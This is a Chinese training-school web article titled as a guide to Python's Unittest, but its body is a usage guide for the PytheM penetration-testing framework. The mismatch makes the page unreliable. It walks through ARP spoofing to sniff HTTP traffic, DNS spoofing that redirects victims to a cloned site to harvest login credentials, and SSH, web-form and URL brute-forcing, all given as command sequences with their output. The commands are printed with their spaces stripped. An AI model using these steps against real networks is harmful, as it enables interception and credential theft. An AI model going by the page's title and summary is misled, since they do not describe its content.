千锋教育-做有情怀、有良心、有品质的职业教育机构

400-811-9990
手机站
千锋教育

千锋学习站 | 随时随地免费学

千锋教育

扫一扫进入千锋手机站

领取全套视频
千锋教育

关注千锋学习站小程序
随时随地免费学习课程

上海
  • 北京
  • 郑州
  • 武汉
  • 成都
  • 西安
  • 沈阳
  • 广州
  • 南京
  • 深圳
  • 大连
  • 青岛
  • 杭州
  • 重庆
当前位置:长沙千锋IT培训  >  技术干货  >  Python的Unittest单元测试使用详解

Python的Unittest单元测试使用详解

来源:千锋教育
发布人:xqq
时间: 2023-11-06 09:00:13

PytheM是一个Python渗透测试框架。它只能在osnGNU/LinuxOS系统上运行。

安装

$sudoapt-getupdate$sudoapt-getinstalllibasound-devlibjack-jackd2-devportaudio19-devpython-pyaudiobuild-essentialpython-devlibnetfilter-queue-devlibespeak1libffi-devlibssl-dev$sudogitclonehttps://github.com/m4n3dw0lf/PytheM/$cdPytheM$sudopipinstall-rrequirements.txt

运行

$sudo./pythem

例子

ARP欺骗-HTTP中间人攻击

命令:

pythem>setinterface[+]Entertheinterface:wlan0pythem>setgateway[+]Enterthegateway:192.168.1.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>sniff[+]Enterthefilter:http

ARP+DNS欺骗-重定向到伪造的页面,收集登录凭证

使用SET等克隆工具克隆你选中的网站,并部署在Apache2上

命令:

pythem>settarget[+]Enterthetarget(s):192.168.0.8pythem>setinterfacewlan0pythem>setgateway192.168.0.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>dnsspoofstart[+]Domaintobespoofed:www.google.com[+]IPaddresstoberedirected:192.168.0.6[+]DNSspoofinginitialized.pythem>sniffdns

SSH暴破-暴力破解

pythem>servicesshstartpythem>settarget[+]Enterthetarget(s):127.0.0.1pythem>setfilewordlist.txtpythem>brute-forcessh[+]Entertheusernametobruteforce:anon123

Web页面参数暴力破解

首先获取web页面登录时的参数格式id=value

显示重定向页面,如果定向到一个不同的页面则说明猜解正确。

命令

pythem>settargethttp://127.0.0.1/pythem>setfile[+]Enterthepathtothefile:wordlist.txtpythem>brute-forcewebform[+]Brute-Formauthenticationinitialized.[+]Entertheinputidoftheusernamebox:vSIS_ID[+]Entertheinputidofthepasswordbox:vSIS_PASS[+]Entertheusernametobrute-forcetheformulary:root

URL内容爆破

pythem>settarget[+]Enterthetarget(s):http://testphp.vulnweb.com/index.php?id=pythem>setfile1to100.txtpythem>brute-forceurl[+]ContentURLbruterinitialized.

功能

[PytheM–PenetrationTestingFrameworkv0.3.2]

help:

打印帮助信息。

exit/quit:

退出程序。

set:

设置变量的值,参数:

interface

gateway

target

file

arpmode例子:

pythem>setinterface|openinputtoset

或者

pythem>setinterfacewlan0|don'topeninputtosetvalue

print:

打印变量的值,例子:

pythem>printgateway

scan:

进行tcp/manualport/arp扫描.

(应该在设置完网卡和目标后再调用)例子:

pythem>scan

或者

pythem>scantcp

arpspoof:

开始或结束arpspoofing攻击.(使用rep或req可以设置arp欺骗的模式,rep表示欺骗响应,req表示欺骗请求)

参数

start

stop

例子:

arpspoofstartarpspoofstop

dnsspoof:

开始dnsspoofing攻击.(应该在arp欺骗攻击开始后再调用)例子:

pythem>dnsspoofstartpythem>dnsspoofstop

sniff:

开始嗅探数据包(应该在设置网卡后再调用)例子:

pythem>sniffhttp

或者

pythem>sniff

[+]Enterthefilter:port1337andhost10.0.1.5|tcpdumplikeformatorhttp,dnsspecificfilter.

pforensic:

开始分析数据包(应该在设置完网卡和.pcap文件后调用)例子:

pythem>pforensicpforensic>help

brute-force:

开始暴力破解攻击(应该在设置完目标和字典文件路径后调用)参数:

ssh|目标是IP地址ipaddressastargeturl|目标是url(包含http://或https://)webform|目标是url(包含http://或https://)例子:pythem>brute-forcewebformpythem>brute-forcessh

geoip:

显示IP地址的大概位置(应该在设置目标(IP地址)后再调用)例子:

pythem>geoip

或者

pythem>geoip8.8.8.8

decodeandencode:

以选择的模式解码和编码字符串,例子:

pythem>decodebase64pythem>encodeascii

cookiedecode:

解码base64url编码的cookie的值,例子:

pythem>cookiedecode

其它在控制台可以执行的命令,比如cd,ls,nano,cat等。

Jarvis–声音控制助手

[*]jarvistypejarvis-helptoseethejarvishelppage.examples:pythem>jarvis(以语音识

以上内容为大家介绍了Python的Unittest单元测试使用详解,希望对大家有所帮助,如果想要了解更多Python相关知识,请关注IT培训机构:千锋教育。

声明:本站稿件版权均属千锋教育所有,未经许可不得擅自转载。

猜你喜欢LIKE

python实现WSGI的框架

2023-11-13

python打开文本文件有哪些方法?

2023-11-13

python使用loguru操作日志

2023-11-13

最新文章NEW

python-=是什么意思

2023-11-13

pythonre是什么?

2023-11-13

python列表追加元素出错的解决

2023-11-13

相关推荐HOT

更多>>

快速通道 更多>>

最新开班信息 更多>>

网友热搜 更多>>